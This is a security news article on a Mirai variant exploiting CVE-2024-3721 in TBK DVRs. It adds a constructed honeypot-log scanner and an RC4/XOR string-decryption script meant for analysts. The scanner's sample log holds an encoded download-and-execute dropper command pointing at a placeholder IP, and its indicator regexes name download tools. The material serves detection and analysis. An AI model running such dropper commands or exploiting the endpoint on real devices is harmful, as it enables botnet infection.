Cybersecurity researchers have discovered a new variant of the notorious Mirai botnet that exploits a critical vulnerability in TBK DVR devices to deploy malicious code remotely.
The attacks leverage CVE-2024-3721, which allows unauthorized system command execution on digital video recording systems commonly used for surveillance purposes.
This latest campaign demonstrates how cybercriminals continue to adapt legacy malware frameworks to target Internet of Things (IoT) devices with enhanced evasion capabilities.
The attack vector centers on CVE-2024-3721, a vulnerability that enables remote code execution on TBK DVR devices without proper authentication.
Security analysts monitoring honeypot systems identified malicious POST requests specifically crafted to exploit this vulnerability.
The attackers send a targeted request to the vulnerable endpoint /device.rsp containing encoded shell commands that download and execute an ARM32 binary payload.
The malicious payload consists of a streamlined shell script that performs several critical actions: it navigates to the temporary directory, removes any existing malware files, downloads a new binary from a remote server, grants execution permissions, and launches the malware with specific parameters.
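The honeypot observation above (POST requests to /device.rsp carrying an encoded shell dropper) translates directly into a detection rule. The following added example, which is not code from the article or from the researchers it cites, scans constructed honeypot records in JSON-lines form, decodes the request body, and flags any POST to the vulnerable endpoint, escalating severity when the decoded body also shows the dropper behaviour the article describes (change to /tmp, file removal, download tool, chmod, execute). The log format, field names, IP addresses and the request body are all constructed for the example.

```python
import json
import re
from typing import List, Optional
from urllib.parse import unquote

# Constructed honeypot records (JSON lines). Not real telemetry: the IPs are
# documentation addresses and the request body is a generic stand-in for the
# encoded shell commands the article describes.
SAMPLE_LOG = """\
{"ts":"2024-06-01T10:00:01Z","src":"203.0.113.10","method":"POST","path":"/device.rsp","body":"cmd=cd%20%2Ftmp%3B%20rm%20-f%20arm%3B%20wget%20http%3A%2F%2F198.51.100.5%2Farm%3B%20chmod%20%2Bx%20arm%3B%20.%2Farm"}
{"ts":"2024-06-01T10:00:02Z","src":"203.0.113.11","method":"GET","path":"/device.rsp","body":""}
{"ts":"2024-06-01T10:00:03Z","src":"203.0.113.12","method":"POST","path":"/login.rsp","body":"user=admin"}
{"ts":"2024-06-01T10:00:04Z","src":"203.0.113.13","method":"POST","path":"/device.rsp","body":"opt=status"}
"""

VULN_ENDPOINT = "/device.rsp"  # endpoint named in the article

# Indicator name -> regex applied to the *decoded* request body. These mirror
# the dropper steps the article lists; they are heuristics, not a signature.
INDICATORS = {
    "download_tool": re.compile(r"\b(wget|curl|tftp)\b"),
    "tmp_dir": re.compile(r"/tmp\b"),
    "chmod_exec": re.compile(r"\bchmod\s+\+?x"),
    "remove_file": re.compile(r"\brm\s+-r?f\b"),
}


def decode_body(body: str) -> str:
    """Undo percent-encoding repeatedly so double-encoded payloads are
    normalised before matching (a common evasion against naive rules)."""
    prev, cur = None, body
    while cur != prev:
        prev, cur = cur, unquote(cur)
    return cur


def analyse_record(rec: dict) -> Optional[dict]:
    """Return a finding for a POST to the vulnerable endpoint, else None.
    The endpoint alone is enough for a medium-severity alert; recognisable
    dropper commands in the body raise it to high."""
    if rec.get("method") != "POST" or rec.get("path") != VULN_ENDPOINT:
        return None
    body = decode_body(rec.get("body", ""))
    hits = [name for name, rx in INDICATORS.items() if rx.search(body)]
    return {
        "ts": rec.get("ts"),
        "src": rec.get("src"),
        "severity": "high" if hits else "medium",
        "indicators": hits,
        "decoded_body": body,
    }


def scan(log_text: str) -> List[dict]:
    """Parse JSON-lines honeypot output and collect findings; malformed
    lines are skipped rather than aborting the whole scan."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue
        finding = analyse_record(rec)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"].upper(), f["src"], ",".join(f["indicators"]) or "-")
```

Matching on the endpoint alone is deliberate: a request to /device.rsp that carries no recognisable dropper commands may still be a probe or a variant with different staging, so it is worth a lower-severity alert rather than silence.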
Unlike traditional botnet infections that include reconnaissance phases to determine system architecture, this campaign specifically targets ARM32-based DVR devices, eliminating the need for preliminary system surveys.
The exploitation technique demonstrates a sophisticated understanding of the target infrastructure, as DVR devices typically run on ARM32 processors and have predictable system configurations.
This targeted approach allows attackers to maximize infection efficiency while minimizing detection risks.
[Figure: The global linked list with decrypted data is accessed whenever the malware needs particular strings.]
Enhanced Mirai Variant Features
This DVR-focused Mirai variant incorporates several advanced features not found in the original botnet source code released nearly a decade ago.
The malware implements RC4 encryption for string obfuscation; the RC4 key is itself stored XOR-encrypted and is decrypted at runtime to reveal the value used to protect the strings.
This encryption mechanism helps evade signature-based detection systems and complicates reverse engineering efforts.
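To see why this layered scheme (XOR-protected key, RC4-protected strings) only slows analysis rather than preventing it, the following added example reproduces the decryption path an analyst writes once the constants are recovered from the binary. It is not code from the article or from the malware; the XOR constant, the obfuscated key bytes and the string table are constructed stand-ins, since the page gives none of the real values. Because RC4 is symmetric, the block builds its own encrypted table with the same routine to simulate blobs carved from the sample, then recovers the key and decrypts every entry into a lookup table that plays the role of the global list of decrypted strings the article mentions.

```python
from typing import Dict, List

# Constructed placeholders: a real sample would supply these from its .data section.
XOR_KEY_BYTE = 0x22
OBFUSCATED_RC4_KEY = bytes.fromhex("66747049115b")  # XOR-decrypts to b"DVRk3y"


def xor_decrypt(data: bytes, k: int) -> bytes:
    """Single-byte XOR, the first layer protecting the RC4 key."""
    return bytes(b ^ k for b in data)


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). Encryption and decryption are the same
    operation, which is why one routine serves both directions."""
    S = list(range(256))
    j = 0
    for i in range(256):  # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:  # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def recover_rc4_key() -> bytes:
    """Step 1 of analysis: strip the XOR layer to obtain the RC4 key."""
    return xor_decrypt(OBFUSCATED_RC4_KEY, XOR_KEY_BYTE)


# Constructed plaintexts standing in for the kinds of strings such a sample
# hides (paths, sandbox indicators); the page does not list the real ones.
_PLAINTEXTS = [b"/proc/", b"vmware", b"qemu-arm", b"/tmp/", b"/dev/"]

# Simulated encrypted table, each entry encrypted with a fresh RC4 state
# under the recovered key, as if carved from the binary.
ENCRYPTED_TABLE: List[bytes] = [rc4(recover_rc4_key(), p) for p in _PLAINTEXTS]


def build_string_table(enc_table: List[bytes], key: bytes) -> Dict[int, str]:
    """Step 2: decrypt every blob once and index the results, mirroring the
    runtime list the malware consults whenever it needs a string."""
    return {i: rc4(key, blob).decode("latin-1") for i, blob in enumerate(enc_table)}


if __name__ == "__main__":
    key = recover_rc4_key()
    for idx, s in build_string_table(ENCRYPTED_TABLE, key).items():
        print(idx, repr(s))
```

Once the key and the table are in hand, the decrypted strings can be fed back into the disassembler as comments, and the same routine can be turned into a YARA-style or sandbox check for the sandbox-indicator strings the variant searches for.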
The malware includes comprehensive anti-analysis capabilities designed to detect virtualized environments and emulation systems.
It systematically examines running processes by accessing the Linux proc filesystem, specifically searching for VMware or QEMU-arm indicators that would suggest execution within a security research environment.
Additionally, the botnet verifies that it operates from expected directory locations based on a hardcoded allowlist.
These evasion techniques represent a significant evolution from earlier Mirai variants, indicating that cybercriminal groups are investing in more sophisticated anti-analysis capabilities to protect their malware investments and extend operational lifespans.
Security Recommendations
Telemetry data reveals that infections are concentrated in China, India, Egypt, Ukraine, Russia, Turkey, and Brazil, with researchers identifying over 50,000 exposed DVR devices vulnerable to this attack vector.
The widespread availability of unpatched devices provides attackers with substantial opportunities for botnet expansion and distributed denial-of-service (DDoS) attack capabilities.
Security experts recommend immediate patching of vulnerable TBK DVR devices and implementation of factory resets for potentially compromised systems.
Since many IoT devices lose malware persistence after reboot due to firmware limitations, regular device restarts can provide temporary protection.
Organizations should prioritize network segmentation and monitoring to detect unusual traffic patterns indicative of botnet communications.
The campaign underscores the critical importance of maintaining updated firmware on IoT devices and implementing robust security monitoring for internet-connected surveillance equipment.